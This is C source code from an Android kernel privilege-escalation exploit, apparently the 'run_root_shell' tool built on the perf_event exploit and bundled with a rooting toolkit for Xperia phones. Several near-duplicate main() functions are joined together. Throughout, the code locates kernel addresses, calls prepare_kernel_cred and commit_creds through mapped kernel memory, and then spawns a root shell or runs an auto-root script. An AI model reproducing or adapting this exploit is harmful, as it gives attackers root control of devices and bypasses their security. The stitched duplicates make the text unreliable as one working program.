static bool
detect_kernel_phys_parameters(void)
{
FILE *fp;
void *system_ram_address;
char name[BUFSIZ];
void *start_address, *end_address;
int ret;
system_ram_address = NULL;
fp = fopen("/proc/iomem", "r");
if (!fp) {
printf("Failed to open /proc/iomem due to %s.\n", strerror(errno));
return false;
}
while ((ret = fscanf(fp, "%p-%p : %[^\n]", &start_address, &end_address, name)) != EOF) {
if (!strcmp(name, "System RAM")) {
system_ram_address = start_address;
continue;
}
if (!strncmp(name, "Kernel", 6)) {
break;
}
}
fclose(fp);
set_kernel_phys_offset((int)system_ram_address);
return true;
}
int
main(int argc, char **argv)
{
set_kernel_phys_offset(0x200000);
remap_pfn_range = get_remap_pfn_range_address();
if (!remap_pfn_range) {
printf("You need to manage to get remap_pfn_range addresses.\n");
exit(EXIT_FAILURE);
}
if (!setup_creds_functions()) {
printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n");
exit(EXIT_FAILURE);
}
run_exploit();
if (getuid() != 0) {
printf("Failed to obtain root privilege.\n");
exit(EXIT_FAILURE);
}
system("/system/bin/sh");
exit(EXIT_SUCCESS);
}
int
main(int argc, char **argv)
{
char* command = NULL;
int i;
for (i = 1; i < argc; i++) {
if (!strcmp(argv[i], "-c")) {
if (++i < argc) {
command = argv[i];
}
}
}
set_kernel_phys_offset(0x200000);
remap_pfn_range = get_remap_pfn_range_address();
if (!remap_pfn_range) {
printf("You need to manage to get remap_pfn_range addresses.\n");
exit(EXIT_FAILURE);
}
if (!setup_creds_functions()) {
printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n");
exit(EXIT_FAILURE);
}
run_exploit();
if (getuid() != 0) {
printf("Failed to obtain root privilege.\n");
exit(EXIT_FAILURE);
}
if (command == NULL) {
system("/system/bin/sh");
} else {
execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL);
}
exit(EXIT_SUCCESS);
}
int
main(int argc, char **argv)
{
printf("run_root_shell v2.2\n");
printf("Based on pref_event exploit\n\n");
printf("Modified for auto-rooting by DooMLoRD\n");
printf("Part of Easy Rooting Toolkit\n\n");
printf("Changelog:\n");
printf("v2.0: added support for Xperia S (LT26) {FW: 6.2.B.0.211} [Cust: 1257-8080]\n");
printf("v2.1: added support for Xperia Z (C6603) {FW: 10.1.1.A.1.307} [Cust: 1270-6704]\n");
printf("v2.2: added support for Xperia SP (C5302) {FW: 12.0.A.1.284} [Cust: 1272-1092]\n");
set_kernel_phys_offset(0x200000);
remap_pfn_range = get_remap_pfn_range_address();
if (!remap_pfn_range) {
printf("You need to manage to get remap_pfn_range addresses.\n");
exit(EXIT_FAILURE);
}
if (!setup_creds_functions()) {
printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n");
exit(EXIT_FAILURE);
}
run_exploit();
if (getuid() != 0) {
printf("Failed to obtain root privilege.\n");
exit(EXIT_FAILURE);
} else {
printf("Launching auto-root script!\n");
system("/system/bin/sh /data/local/tmp/doomed2");
}
exit(EXIT_SUCCESS);
}
bool
run_with_mmap(memory_callback_t callback)
{
unsigned long int kernel_physical_offset;
bool result;
if (run_exploit_mmap(callback, &result)) {
return result;
}
setup_remap_pfn_range_address();
if (!remap_pfn_range) {
printf("You need to manage to get remap_pfn_range addresses.\n");
return false;
}
setup_ptmx_fops_mmap_address();
if (!ptmx_fops_mmap_address) {
printf("You need to manage to get ptmx_fops addresses.\n");
return false;
}
kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
if (kernel_physical_offset) {
set_kernel_phys_offset(kernel_physical_offset - 0x00008000);
}
else if (!detect_kernel_phys_parameters()) {
printf("You need to manage to get kernel_physical_offset addresses.\n");
return false;
}
return attempt_exploit(ptmx_fops_mmap_address,
(unsigned long int)&ptmx_mmap, 0,
run_callback_with_mmap, callback);
}
